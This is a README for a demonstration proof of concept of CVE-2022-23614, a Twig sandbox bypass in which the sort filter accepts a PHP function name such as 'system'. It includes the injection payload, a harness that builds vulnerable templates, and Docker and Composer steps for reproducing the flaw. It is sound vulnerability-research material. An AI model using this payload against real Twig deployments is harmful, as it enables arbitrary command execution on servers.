Proof of concept for CVE-2022-23614 (command injection in Twig)# CVE-2022-23614
Proof of concept (PoC) for [CVE-2022-23614](https://nvd.nist.gov/vuln/detail/CVE-2022-23614) referenced in the [DSA-5107-1](https://www.debian.org/security/2022/dsa-5107).
- **CVSS-2.0**: 7.5
- **CVSS-3.X**: 9.8
## Explanation
Twig is a flexible, fast, and secure template engine for PHP. Notably, it is possible to use filters in a template before rendering it. The `sort` filter can be used to sort the elements of an array with the following structure:
```twig
{{ [5,8,2,3]|sort('desc') }}
```
Twig has a sandbox mode to evaluate untrusted template code. When in this sandbox mode, the `arrow` parameter of the `sort` filter must be a closure to avoid attackers being able to run arbitrary PHP functions. In affected versions this constraint was not properly enforced and could lead to code injection of arbitrary PHP code.
```twig
{{ ["id",""]|sort('system') }}
```
## Usage
This PoC illustrates the vulnerability in two different use cases: either using Debian `php-twig` (v2.14.1) package or using Composer `twig/twig` (v2.14) module.
The `index.php` file crafts a Twig template based on the first argument. In the following code, `argv[1]` is the name of the sorting function that will be used by Twig when rendering.
```php
// index.php - line 28
$templateCode .= "{{ args|sort('" . $sortFunction . "') }}\n";
```
Then, `index.php` will use two deprecated functions of Twig to load the generated template. Eventually, it uses the second argument (`argv[2]`) to pass data to the template as it is being rendered, notably the `args` array that we want to sort.
```php
// index.php - line 44
$renderedTemplate = $modifiedTemplate->render($arrayToSort);
```
The rendered template is then printed in the standard output.
> Please note this repository was made for **demonstration purposes only**. It is meant to be simple to understand and easy to use in order to play with the CVE using only a command line interface. It is quite far from what one can find on an actual vulnerable server.
### php-twig
Using Docker, we are able to recreate the context of the original [Debian Security Advisory (DSA)](https://www.debian.org/security/2022/dsa-5107). You can use the given `build-docker.sh` script in order to properly build and run the vulnerable container.
```
chmod a+x build-docker.sh
./build-docker.sh
```
The container should shut down once the payload is executed (an `id` command). If you want to try your own commands, you can run the container in interactive mode:
```
docker build -t cve-2022-23614 .
docker run -it --rm cve-2022-23614 /bin/bash
```
Once in the container, you can craft your own payload using the following model:
```
php index.php system '{"args":["id",""]}'
^ ^
sorting function array to sort
```
> This dockerfile was partially created using [DECRET](https://github.com/Orange-OpenSource/decret).
### Composer
If you have php and Composer already installed on your machine, you can replicate the exploit using the vulnerable Composer module.
```
cd exploit
composer install
```
Then you just have to play with the payload.
```
php index.php system '{"args":["id",""]}'
```
---
## References
**CVE details**: https://nvd.nist.gov/vuln/detail/CVE-2022-23614
**DSA**: https://www.debian.org/security/2022/dsa-5107
**Patch commit**: https://github.com/twigphp/Twig/commit/22b9dc3c03ee66d7e21d9ed2ca76052b134cb9e9
**PoC by davwwwx** (using GUI): https://github.com/davwwwx/CVE-2022-23614
[4.0K] /data/pocs/8051fce50292fce7f1634c7d7680d17df6f1cbbd
├── [ 101] build-docker.sh
├── [ 697] Dockerfile
├── [4.0K] exploit
│ ├── [ 181] composer.json
│ ├── [8.7K] composer.lock
│ └── [1.4K] index.php
├── [3.4K] README.md
└── [ 231] snapshot.list
1 directory, 7 files